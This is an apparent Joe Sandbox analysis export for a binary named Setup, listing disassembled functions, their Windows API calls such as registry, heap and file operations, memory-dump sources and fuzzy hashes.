Instruction ID: 292c03c592e8df55dcdf6ff51c96ddf20616d209a539032c7a7d9df82f2a56f9
Opcode Fuzzy Hash: 370ff79ed4ac6d2ed3653e0e0fa3c6a9edaed822111a5261e5568a9868e90a12
Instruction Fuzzy Hash: 5B71F2B09002289FDB24DF64EC99BAEB7B0FF54308F10469DE51997680E775AAD4CF90

Function 0093241B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00931F51: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 00931F7C

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00932261,?,00000000,?,00000000,?), ref: 0093247C
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00932261,?,00000000,?,00000000,?), ref: 009324B8

Strings

&_', xrefs: 00932423

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CodeInfoPageValid
String ID: &_'
API String ID: 546120528-2411122644
Opcode ID: 7c35f1f6ce157eff9a67ecaf8da50a37b72693409216a703c3d8058cf5b12bd6
Instruction ID: 4a128a9a377b740ffc22727373e43d346cf0dbeacc8c66ad04eb62c8295a1dd9
Opcode Fuzzy Hash: 7c35f1f6ce157eff9a67ecaf8da50a37b72693409216a703c3d8058cf5b12bd6
Instruction Fuzzy Hash: 14513571A042459FDB20CF75C8956AAFBF8EF85304F14806EE0868B261E774DA46CF80

Function 0087CBD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173registryCOMMON

Download Yara Rule

APIs

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

RegOpenKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,00000001,?), ref: 0087CCC1
RegCloseKey.ADVAPI32(00000000,275F26E1,00000000,?,?,00000000,00990988,000000FF,?,80004005,275F26E1,?), ref: 0087CD69

Strings

&_', xrefs: 0087CBE7, 0087CD44

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CloseHeapOpenProcess
String ID: &_'
API String ID: 901800290-2411122644
Opcode ID: eaf4f9b9377d9d66c930b77582b9175ff94842e8583484b1175b750b8f4b2193
Instruction ID: e93204f3c557bdcc578f555770afa0107a46a535fd594ce593a97076b776df45
Opcode Fuzzy Hash: eaf4f9b9377d9d66c930b77582b9175ff94842e8583484b1175b750b8f4b2193
Instruction Fuzzy Hash: 42518D71A006099FDB10CF68C845BAABBF9FF45324F148269E829D73D1DB75AA01CB90

Function 006FE670 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 006FE7D1
SysFreeString.OLEAUT32(00000000), ref: 006FE80D

Strings

&_', xrefs: 006FE687

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: FreeString
String ID: &_'
API String ID: 3341692771-2411122644
Opcode ID: 651eae597eadfd654de61f507db1642e1124d26a94be96159ae7277a5541a23f
Instruction ID: 9fb3fcd5acda3140c3b2287816cf46f298e3f5c9524e84c1b7d9e9ba36494df7
Opcode Fuzzy Hash: 651eae597eadfd654de61f507db1642e1124d26a94be96159ae7277a5541a23f
Instruction Fuzzy Hash: 80515F71A042299FCF04DF98DC45AAEBBB9FF48710F11425AE915E73A0DB75A901CB90

Function 006F70C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 159COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(?,?,00000008,?,00000008,275F26E1,?,?,?,80004005,275F26E1), ref: 006F7177

Strings

&_', xrefs: 006F70DF, 006F7238, 006F7286
&_', xrefs: 006F70D7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExistsFilePath
String ID: &_'$&_'
API String ID: 1174141254-224754792
Opcode ID: 11d1e57a140d7b16ade593598e6375b0f6f013bc56c60b1406a02212c2d8abaa
Instruction ID: 9e60e79f8a0909fe39c2956ac861b7bfd2ef771b2856c5e57794a2cb955bd496
Opcode Fuzzy Hash: 11d1e57a140d7b16ade593598e6375b0f6f013bc56c60b1406a02212c2d8abaa
Instruction Fuzzy Hash: F751B131A046099FCB14DF98CC45ABDB7B6FF44324F1482ADE925A7391DB35AE06CB90

Function 0083EDE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 155COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,00A68370,00000104,275F26E1), ref: 0083EE4D

Part of subcall function 006EAF70: RtlAllocateHeap.NTDLL(?,00000000,?,275F26E1,00000000,0093C660,000000FF,?,?,00A5D9BC,?,00000000,0088F88B,8000000B,275F26E1), ref: 006EAFBA

Strings

LOG, xrefs: 0083EE98
&_', xrefs: 0083EDF7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: AllocateFileHeapModuleName
String ID: LOG$&_'
API String ID: 2274142570-1090124674
Opcode ID: f56e3eeb34403834104614bd2af31f89395186c6241f91d453ca2d85f5c53bf8
Instruction ID: 541a58021a7a085f1ddbfdb3b2f4c11c484690333493e947d93e1e4cd30d0507
Opcode Fuzzy Hash: f56e3eeb34403834104614bd2af31f89395186c6241f91d453ca2d85f5c53bf8
Instruction Fuzzy Hash: 4051E1319002099BCB24DFA8DC49BE9B7B4FF84310F1046EAE416D72C1EB74AA45CF91

Function 00700F60 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000033,?,?,00000002,009D3180,00000000,?,80000001,00000001,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033,275F26E1), ref: 007010F4

Strings

AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 00700FB8
&_', xrefs: 00700F8B

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Close
String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current$&_'
API String ID: 3535843008-527411964
Opcode ID: 49b99ccd966a6dca30fd15e3c93ec085e2a1b515a4691ff12c60338717d1cf90
Instruction ID: f1d675ff34c1187b080690cae3ccc950d3d8cd2891bc532f1149c8327d9aa9eb
Opcode Fuzzy Hash: 49b99ccd966a6dca30fd15e3c93ec085e2a1b515a4691ff12c60338717d1cf90
Instruction Fuzzy Hash: B351C2B0D1024CAFDB14DF68CD85BEEB7B5AF44304F608259E515A72C1EB786A84CB90

Function 007309C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

Part of subcall function 00730C00: FindResourceW.KERNEL32(00000000,?,00000006,000000FF,?,?,00000000,007D28A0,?,?,?,?,275F26E1,000000FF,00000000), ref: 00730C3D
Part of subcall function 00730C00: WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,?,?,?,275F26E1,000000FF,00000000), ref: 00730C6E
Part of subcall function 00730C00: WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,?,00000000,00000000,00000000,00000000,?,?,?,275F26E1,000000FF,00000000,?,invalid string_view position), ref: 00730CA5

WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 00730A39
WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,00000000,00000000), ref: 00730A6F

Strings

&_', xrefs: 007309D5, 00730AD4

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ByteCharMultiWide$FindHeapProcessResource
String ID: &_'
API String ID: 2083075878-2411122644
Opcode ID: 0f20acbc4218e457795e69da7ae6f744c463d4a302d6721552c24310c3346920
Instruction ID: 06e2da3a3cbba38cd5e3d2c432794582b2be4264ea98f5e448df95e6d16d3e11
Opcode Fuzzy Hash: 0f20acbc4218e457795e69da7ae6f744c463d4a302d6721552c24310c3346920
Instruction Fuzzy Hash: AC41CE31704715AFEB10CF58DC55B6EBBA9EF44B20F204219F921AB3C1DB75AD018B90

Function 007E2B00 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000000,00000000,00000100,00000000), ref: 007E2BA0
LoadStringW.USER32(00855157,00000000,00000100,00000000), ref: 007E2C58

Strings

&_', xrefs: 007E2B17

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: LoadString
String ID: &_'
API String ID: 2948472770-2411122644
Opcode ID: 33533e1de899ae9ff9748f9390d38b733fe32627b925396ea601f276872ec832
Instruction ID: 697beeda0f17f401b95042eb888175a630f5ff77f283e5eae42cc9f88617d55a
Opcode Fuzzy Hash: 33533e1de899ae9ff9748f9390d38b733fe32627b925396ea601f276872ec832
Instruction Fuzzy Hash: B94193B1E05208ABDB14CF99DD457AEBBBCFF48760F10422AF819D3391E77589418BA0

Function 0087D2A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,000000C8,00000000,000000C8,000000C8), ref: 0087D30E
RegQueryValueExW.ADVAPI32(?,?,00000000,000000C8,00000000,00000002,00000002,000000C8), ref: 0087D350

Strings

&_', xrefs: 0087D2B7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: QueryValue
String ID: &_'
API String ID: 3660427363-2411122644
Opcode ID: 6d8a9adf84c1101c5bada018a62fcda22cb0ca5dd4c9aff5ce7560d90bb35259
Instruction ID: 55e35ce9fc7adfd9e1542d61cd47246494d5d31d338f97b8702df6209c4e025b
Opcode Fuzzy Hash: 6d8a9adf84c1101c5bada018a62fcda22cb0ca5dd4c9aff5ce7560d90bb35259
Instruction Fuzzy Hash: 3C41AFB1901209ABDF10DBA8DD41BFFB7B8FF14304F104419E915E7281E771AA44CBA2

Function 00729260 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 007293A3
std::_Throw_Cpp_error.LIBCPMT ref: 007293AE

Strings

&_', xrefs: 00729276

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Cpp_errorThrow_std::_
String ID: &_'
API String ID: 2134207285-2411122644
Opcode ID: 4063f68cf76a4a96de404b661863cc8072b07c0d0aaac1c72f20a8232d485f10
Instruction ID: 77edb696e1c28f47bd8a622ae5b83e90e536ea38d20de0fb1d5bbf021555199b
Opcode Fuzzy Hash: 4063f68cf76a4a96de404b661863cc8072b07c0d0aaac1c72f20a8232d485f10
Instruction Fuzzy Hash: 9F31C0B0E00219DBDB04DF68D8057AEB7F5FF84314F14461AE4159B3C1DBB9AA05CB91

Function 0092D0E2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,00000000,?,00000000,0092D4B3,00000000,?,00000000,0091D722,00000000,00000000,?,00000000,?,0090FAC5), ref: 0092D1CB
GetLastError.KERNEL32(0092D4B3,00000000,?,00000000,0091D722,00000000,00000000,?,00000000,?,0090FAC5,0091D722,00000000,0090FAC5,?,?), ref: 0092D1FB

Strings

&_', xrefs: 0092D0F1

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: &_'
API String ID: 442123175-2411122644
Opcode ID: 0676954d443cb9f7d7c55ffce94281cdf2706a1dd969625f5bf9036461f62a84
Instruction ID: fd1f873ed4648915afb7722c7333a27835a5a02be169d3dd49fc0bd98506365f
Opcode Fuzzy Hash: 0676954d443cb9f7d7c55ffce94281cdf2706a1dd969625f5bf9036461f62a84
Instruction Fuzzy Hash: 50318671B05229AFDB18CF59DC91BEAB7B9EF44304F1440A9E505D72A0D770ED918FA0

Function 006FC250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0000002C,00000000), ref: 006FC31B
GetLastError.KERNEL32 ref: 006FC325

Strings

&_', xrefs: 006FC267

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpin
String ID: &_'
API String ID: 439134102-2411122644
Opcode ID: 13ab0b0aa402eb6ddfd99fa5d6920d9610d4a5f33b6c2487a63bf3601fbbe547
Instruction ID: e5942354322e3c92a8f7ef7a359e2c24a899622f06b5ce3c10ffde2d180508bc
Opcode Fuzzy Hash: 13ab0b0aa402eb6ddfd99fa5d6920d9610d4a5f33b6c2487a63bf3601fbbe547
Instruction Fuzzy Hash: 8831FC72E0471D9BDB10CFA989417AEFBE4FF45764F10426AE914E7380DBB69A0086D0

Function 006FCDD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,00000000), ref: 006FCE9B
GetLastError.KERNEL32 ref: 006FCEA5

Strings

&_', xrefs: 006FCDE7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpin
String ID: &_'
API String ID: 439134102-2411122644
Opcode ID: 3435ea01b56e2812fb10ae89b70523931e57d50f8e149dcf5e3af6c87b57b302
Instruction ID: 93dac8ca16e83cc3b69855e1a33d804411a250b1d2ddad4275471489c6db3400
Opcode Fuzzy Hash: 3435ea01b56e2812fb10ae89b70523931e57d50f8e149dcf5e3af6c87b57b302
Instruction Fuzzy Hash: 2A31EE72A0472D9BDB10CFA989417AEFBE5EF48724F11026AE914E7380DB759A008BD0

Function 00931275 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMONLIBRARYCODE

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,-00000008,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,FFFFF9B4), ref: 0093133C
__freea.LIBCMT ref: 00931349

Part of subcall function 0092A610: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,0092C6C5,?,00000000,?,0091BDB9,?,00000004,?,?,?,?,00927FDC), ref: 0092A645

Strings

&_', xrefs: 0093127D

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: AllocateHeapStringType__freea
String ID: &_'
API String ID: 4073780324-2411122644
Opcode ID: 051e85b31acd4b5036648a18f89bec7873f748e49cb52dcc341f5ca6d580a7ab
Instruction ID: e5e9b3218a386802d24ea63e01992962017e6d5399d83b5edda4f719e7cdf365
Opcode Fuzzy Hash: 051e85b31acd4b5036648a18f89bec7873f748e49cb52dcc341f5ca6d580a7ab
Instruction Fuzzy Hash: 4831C272A0021AAFDF219FA5CC45EEF7BA9EF84310F080558F815AB261DB34CD50CB90

Function 00880A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

&_', xrefs: 00880B67

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: &_'
API String ID: 0-2411122644
Opcode ID: 1b9a3c8336dc28b7ad7f445cb83a2787d5336eb9e5c19858b258e43ad0bbe4a4
Instruction ID: 4a91f0990ec24a1d171fedb407317f1eae7b9277d50167feea9d1c6e06238b7b
Opcode Fuzzy Hash: 1b9a3c8336dc28b7ad7f445cb83a2787d5336eb9e5c19858b258e43ad0bbe4a4
Instruction Fuzzy Hash: 38314B71A0425AAFDB05EFA8CC45AAEBBF9FF09310F010169E914E7651DB70AD04CBA1

Function 00878280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,275F26E1,?,0000000C,00000000,?,00000000,0098FAD6,000000FF,?,80004005,275F26E1,00000000,0000000C), ref: 008782D7
RemoveDirectoryW.KERNEL32(?,275F26E1,?,0000000C,00000000,?,00000000,0098FAD6,000000FF,?,80004005,275F26E1,00000000,0000000C), ref: 00878303

Strings

&_', xrefs: 00878295

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
